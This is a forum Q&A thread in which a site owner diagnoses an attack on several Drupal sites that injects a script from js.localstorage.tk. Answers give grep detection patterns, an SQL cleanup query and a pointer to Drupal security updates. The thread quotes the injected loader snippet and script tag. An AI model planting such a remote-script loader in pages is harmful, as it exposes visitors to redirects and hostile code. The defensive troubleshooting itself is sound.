1

From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page).

In chrome browser when I try to diagnose the problem through console (F12), I found it shows me a strange error. "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" and url is - https://js.localstorage.tk/s.js?crt=new. In further investigation I found that it injects following script on every page load of every website on that particular server. (Not one site but 3-4 sites have been infected with same attack on same server).

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

I have also tried to find this code snippet in hosted file systems of infected websites, using various "grep" commands as below but i couldn't found anything.

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

But no clue of malicious injected script. Same result in DB investigation.

When I access my site through LAN without internet then the same error with some weird URL : 

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

And worst thing is that now google has listed my sites into "Dangerous" list and it show warning "Deceptive site ahead" with dark red background.

Any help...!!!

Vega
  • 27,856
  • 27
  • 95
  • 103
Sohel Pathan
  • 367
  • 3
  • 13

2 Answers2

2

find code with this command

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

sadadd
  • 36
  • 1
  • Thanks @sadadd. You are right. This command gave me the entire list of affected files. Can anyone explain me how those files have been affected? Should I further investigate for any batch file or some virus file? If yes, then how. – Sohel Pathan May 03 '18 at 11:53
  • In my case, all *.tpl.php files were get afftected in /var/www/ directory. – Sohel Pathan May 03 '18 at 11:54
1

You should check your DB.

I have the same problem and found the script in every row of field_data_body table in body_summary column.

Perform a on all tables with the following query: %js.localstorage.tk%

Here is a removal query:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");
Gardonyi Peter
  • 21
  • 1
  • 4
  • In my case @sadadd's answer helped and worked well. As I mentioned in question that I couldn't find any such keyword in DB using like operators. By the way thanks for sharing your scenario so that it may help to future visitors to this thread. – Sohel Pathan May 05 '18 at 10:37
  • Additionally, Please share the route cause of the said attack, If you been able to find it. Which part of server/file compromised so that this kind of malicious thing happened ? – Sohel Pathan May 05 '18 at 10:42
  • @SohelPathan: I've seen this on servers that did not upgrade in time to the latest Drupal versions over the last several weeks. See https://www.drupal.org/security/ for details. – bhotel May 08 '18 at 10:00
  • @bhotel thanks for your reply, I will check it out for Drupal version and other security alerts if any. – Sohel Pathan May 10 '18 at 06:21
  • @bhotel you are right. It shows notification stating "Security update required!". I will do the update. Apart from that I also found that all *.tpl.php on that particular server were affected on same timestamp. How it was been attacked ? On the fly over internet ? Or some batch/script file is still exists on my server which caused the malicious thing. – Sohel Pathan May 15 '18 at 09:41
  • @SohelPathan There may be no way to tell. There's a Drupal-specific guide for what to do after your site's been compromised here: https://www.drupal.org/docs/develop/security/your-drupal-site-got-hacked-now-what – bhotel May 15 '18 at 12:30